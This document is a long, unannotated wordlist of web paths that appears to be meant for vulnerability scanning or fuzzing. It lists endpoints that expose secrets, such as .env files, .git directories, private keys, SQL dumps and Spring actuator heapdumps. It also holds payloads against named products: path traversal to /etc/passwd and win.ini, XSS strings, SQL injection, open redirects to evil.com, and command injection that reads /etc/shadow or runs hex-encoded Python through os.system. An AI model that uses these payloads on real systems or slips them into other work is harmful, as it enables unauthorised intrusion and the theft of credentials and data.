/+CSCOE+/logon.html /+CSCOT+/oem /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua /+CSCOT+/translation /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /..%5c..%5c..%5c..%5c..%5cetc/passwd /..%5c..%5c..%5c..%5cetc/passwd /..%5c..%5c..%5cetc/passwd /..%5c..%5cetc/passwd /..%5cetc/passwd /..;/examples/jsp/index.html /..;/examples/servlets/index.html /..;/examples/websocket/index.xhtml /..;/manager/html /./../../../../../../../../../../etc/passwd /.composer/composer.json /.DS_Store /.env /.env.dev.local /.env.development.local /.env.prod.local /.env.production.local /.git /.htaccess /.htpasswd /.redmine /.settings/rules.json?auth=FIREBASE_SECRET /.svn /.svn/entries /.svn/prop /.svn/text /.well /.wp-config.php.swp /////evil.com ///evil.com/%2F.. //evil.com/%2F.. //evil.com/..;/css //secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search /_cat/health /_cat/indices /_cluster/health /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd /abs/ /access/config /actions/seomatic/meta /actuator /actuator/auditevents /actuator/auditLog /actuator/beans /actuator/caches /actuator/conditions /actuator/configprops /actuator/configurationMetadata /actuator/dump /actuator/env /actuator/events /actuator/exportRegisteredServices /actuator/features /actuator/flyway /actuator/healthcheck /actuator/heapdump /actuator/httptrace /actuator/hystrix.stream /actuator/integrationgraph /actuator/jolokia /actuator/liquibase /actuator/logfile /actuator/loggers /actuator/loggingConfig /actuator/management /actuator/mappings /actuator/metrics /actuator/refresh /actuator/registeredServices /actuator/releaseAttributes /actuator/resolveAttributes /actuator/scheduledtasks /actuator/sessions /actuator/shutdown /actuator/springWebflow /actuator/sso /actuator/ssoSessions /actuator/statistics /actuator/status /actuator/threaddump /actuator/trace /actuators/ /actuators/dump /actuators/env /actuators/health /actuators/logfile /actuators/mappings /actuators/shutdown /actuators/trace /adfs/services/trust/2005/windowstransport /adjuncts/3a890183/ /admin /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s /admin/ /admin//phpmyadmin/ /admin/adminer.php /admin/data/autosuggest /admin/error.log /admin/errors.log /admin/heapdump /admin/index.php /admin/log/error.log /admin/login /admin/login.html /admin/login/?next=/admin/ /admin/logs/error.log /admin/logs/errors.log /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 /admin/views/ajax/autocomplete/user/a /adminadminer.php /adminer.php /adminer/ /adminer/adminer.php /adminer/index.php /ADSearch.cc?methodToCall=search /aims/ps/ /airflow.cfg /AirWatch/Login /alps/profile /altair /analytics/saw.dll?bieehome&startPage=1#grabautologincookies /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd /anchor/errors.log /ansible.cfg /apache /apc.php /apc/apc.php /api /api/ /api/__swagger__/ /api/_swagger_/ /api/api /api/apidocs /api/apidocs/swagger.json /api/application.wadl /api/batch /api/cask/graphql /api/config /api/docs/ /api/index.html /api/jolokia/read?mimeType=text/html /api/jsonws /api/jsonws/invoke /api/profile /api/proxy /api/snapshots /api/spec/swagger.json /api/swagger /api/swagger.json /api/swagger.yaml /api/swagger.yml /api/swagger/index.html /api/swagger/static/index.html /api/swagger/swagger /api/swagger/ui/index /api/timelion/run /api/v1/ /api/v1/swagger.json /api/vendor/phpunit/phpunit/phpunit /api/whoami /apis /app/etc/local.xml /app/kibana/ /application.wadl /application.wadl?detail=true /apps/vendor/phpunit/phpunit/phpunit /asdf.php /assets../.git/config /assets/file /asynchPeople/ /auditevents /aura /auth.html /authorization.do /autoconfig /autodiscover/ /autoupdate/ /backup /backup.sql /backup/vendor/phpunit/phpunit/phpunit /base/static/c /beans /blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= /blog/phpmyadmin/ /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB /bugs/verify.php?confirm_hash=&id=1 /bundles/kibana.style.css /bundles/login.bundle.js /cacti/ /certenroll/ /certprov/ /certsrv/ /cgi /CgiStart?page=Single /ckeditor/samples/ /cloudfoundryapplication /cluster/cluster /composer.json /composer.lock /conf/ /config/database.yml /config/databases.yml /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E /configprops /console /console/login/LoginForm.jsp /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E /content../.git/config /context.json /control/login /control/stream?contentId= /controller/config /controller/registry /counters /cp/Shares?user=&protocol=webaccess&v=2.3 /crossdomain.xml /crowd/console/login.action /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow /crx/de/index.jsp /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( /css../.git/config /CTCWebService/CTCWebServiceBean /CTCWebService/CTCWebServiceBean?wsdl /dasbhoard/ /dashboard/ /data.sql /data/adminer.php /data/autosuggest /database.sql /db.sql /dbdump.sql /debug /debug.cgi /debug/pprof/ /demo /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample /dfshealth.html /dialin/ /dispatcher/invalidate.cache /Dockerrun.aws.json /docs/swagger.json /domcfg.nsf /download /druid/coordinator/v1/leader /druid/coordinator/v1/metadata/datasources /druid/index.html /druid/indexer/v1/taskStatus /dump /dump.sql /eam/vib?id=/etc/issue /ecp/ /editor/ckeditor/samples/ /elmah.axd /email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E /emergency.php /env /error.log /error.txt /error/error.log /errors.log /errors.txt /errors/errors.log /etc /etc/ /events../.git/config /evil%E3%80%82com /evil.com/ /evil.com// /ews/ /examples/jsp/index.html /examples/jsp/snp/snoop.jsp /examples/servlets/index.html /examples/websocket/index.xhtml /exchange/ /exchweb/ /explore /express /extdirect /fckeditor/_samples/default.html /fetch /filemanager/upload.php /filezilla.xml /FileZilla.xml /filter/jmol/iframe.php?_USE=%22};alert(1337);// /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file /flow/registries /forum/phpmyadmin/ /fw.login.php /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; /gallery/zp /getcfg.php /getFavicon?host=burpcollaborator.net /global /gotoURL.asp?url=google.com&id=43569 /graph /graphiql /graphiql.css /graphiql/finland /graphql /graphql-explorer /graphql.php /graphql/console /graphql/graphql /graphql/schema.json /graphql/schema.xml /graphql/schema.yaml /groovyconsole /groupexpansion/ /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E /health /healthz /heapdump /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E /homepage.nsf /host.key /hsqldb%0a /hybridconfig/ /HyperGraphQL /hystrix.stream /i.php /IdentityGuardSelfService/ /IdentityGuardSelfService/images/favicon.ico /images../.git/config /img../.git/config /IMS /index.htm /index.jsp /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /index.php?redirect=//evil.com /index.php?redirect=/\/evil.com/ /INF/maven/com.atlassian.jira/atlassian /info.php /infophp.php /install.php?profile=default /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 /installer /invoker/EJBInvokerServlet/ /invoker/JMXInvokerServlet /invoker/JMXInvokerServlet/ /ipython/tree /irj/portal /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f /jasperserver/login.html?error=1 /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample /jenkins/script /jira/secure/Dashboard.jspa /jkstatus /jkstatus/ /jkstatus; /jmx /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc /jolokia /jolokia/exec/ch.qos.logback.classic /jolokia/list /jolokia/read?mimeType=text/html /jolokia/version /josso/%5C../invoker/EJBInvokerServlet/ /josso/%5C../invoker/JMXInvokerServlet/ /js../.git/config /jsp/help /key.pem /laravel /lfm.php /lib../.git/config /lib/phpunit/phpunit/phpunit /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; /localhost.sql /log/error.log /log/errors.log /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E /logfile /loggers /login.jsp /Login?!> /metrics /mgmt/tm/sys/management /microsoft /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https /mifs/c/d/android.html /mifs/login.jsp /mifs/user/login.jsp /mobile/error /modules/vendor/phpunit/phpunit/phpunit /mrtg/ /MRTG/ /my.key /mysql.sql /mysqldump.sql /names.nsf/People?OpenView /nginx_status /node/1?_format=hal_json /nuxeo/login.jsp/pwn${31333333330+7}.xhtml /oab/ /ocsp/ /old/vendor/phpunit/phpunit/phpunit /oldsite/vendor/phpunit/phpunit/phpunit /opcache /Orion/Login.aspx /os/mxperson /owa/ /owncloud/config/ /package /package.json /pages/includes/status /PDC/ajaxreq.php?PARAM=127.0.0.1+ /perl /persistentchat/ /phoneconferencing/ /php /php.php /php/adminer.php /php/phpmyadmin/ /phpinfo.php /phpmyadmin/ /phpversion.php /pinfo.php /playground /plugin/build /plugins/servlet/gadgets/makeRequest?url=https /plugins/servlet/gadgets/makeRequest?url=https://google.com /plugins/servlet/gadgets/makeRequest?url=https://google.com /plugins/servlet/oauth/users/icon /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) /PMUser/ /pods /portal /powershell/ /pprof /private /privatekey.key /profile /provider.tf /proxy /proxy.stream?origin=http /PRTG/index.htm /prtg/index.htm /public/ /public/adminer.php /publicadminer.php /query /rails/actions?error=ActiveRecord /reach/sip.svc /read_file /readfile /remote/login /Reports/Pages/Folder.aspx /ReportServer/Pages/ReportViewer.aspx /requesthandler/ /requesthandlerext/ /rest/api/2/dashboard?maxResults=100 /rest/api/2/project?maxResults=100 /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true /rest/beta/repositories/go/group /rest/tinymce/1/macro/preview /rest/tinymce/1/macro/preview /rgs/ /rgsclients/ /rpc/ /rpcwithcert/ /run /s/sfsites/aura /sap/hana/xs/formLogin/login.html /scheduler/ /schema /script /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 /search?search_key={{1337*1338}} /secure/ConfigurePortalPages!default.jspa?view=popular /secure/ConfigurePortalPages!default.jspa?view=popular /secure/ContactAdministrators!default.jspa /secure/Dashboard.jspa /secure/ManageFilters.jspa?filter=popular&filterView=popular /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false /secure/popups/UserPickerBrowser.jspa /secure/popups/UserPickerBrowser.jspa /secure/QueryComponent!Default.jspa /secure/ViewUserHover.jspa /security.txt /sell /server /server-status /server.key /service?Wsdl /servicedesk/customer/user/login /servicedesk/customer/user/login /servicedesk/customer/user/signup /servicedesk/customer/user/signup /servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https /sessions/new /sfsites/aura /share/page/dologin /shutdown /sidekiq /site.sql /sitemanager.xml /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit /solr/ /sphinx /spring /sql.sql /sslmgr /stat.jsp?cmd=chcp+437+%7c+dir /static../.git/config /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /static/..%5c..%5c..%5c..%5c..%5cetc/passwd /static/..%5c..%5c..%5c..%5cetc/passwd /static/..%5c..%5c..%5cetc/passwd /static/..%5c..%5cetc/passwd /static/..%5cetc/passwd /static/../../../a/../../../../etc/passwd /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E /status/selfDiscovered/status /store/app/etc/local.xml /swagger /swagger-resources /swagger-ui /swagger-ui.html /swagger.json /swagger/index.html /swagger/swagger /swagger/v1/swagger.json/ /system /systemstatus.xml /Telerik.Web.UI.DialogHandler.aspx /Telerik.Web.UI.WebResource.axd?type=rau /temp.sql /test /test.cgi /test.php /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd /threaddump /tiki /time.php /tmui/login.jsp /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5 /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' /tmui/tmui/login/welcome.jsp /tools/adminer.php /toolsadminer.php /trace /Trace.axd /translate.sql /ucwa/ /ueditor/php/getRemoteImage.php /unifiedmessaging/ /user/0 /user/1 /user/2 /user/3 /userportal/webpages/myaccount/login.jsp /users.sql /v1.0/ /v1/ /vendor/composer/installed.json /vendor/phpunit/phpunit/phpunit /verify.php?id=1&confirm_hash= /version.web /views/ajax/autocomplete/user/a /virtualems/Login.aspx /VirtualEms/Login.aspx /vpn/../vpns/cfg/smb.conf /vpn/index.html /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd /WEB-INF/web.xml /web.config /web/adminer.php /web/phpmyadmin/ /web/static/c /webadmin/out /webadmin/start/ /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 /webadminer.php /webalizer/ /webapp/?fccc0\>5f43d=1 /webclient/Login.xhtml /webconsole/webpages/login.jsp /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini /webmin/ /webticket/ /webticket/webticketservice.svc /webticket/webticketservice.svcabs/ /wp /www.key /www/delivery/afr.php?refresh=10000&\),10000000);alert(1337);setTimeout(alert(\ /xampp/phpmyadmin/ /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini /xmlrpc.php /xprober.php /yii/vendor/phpunit/phpunit/phpunit /zabbix.php?action=dashboard.view&dashboardid=1 /zend/vendor/phpunit/phpunit/phpunit /zenphoto/zp /zipkin/ /zp /zp/zp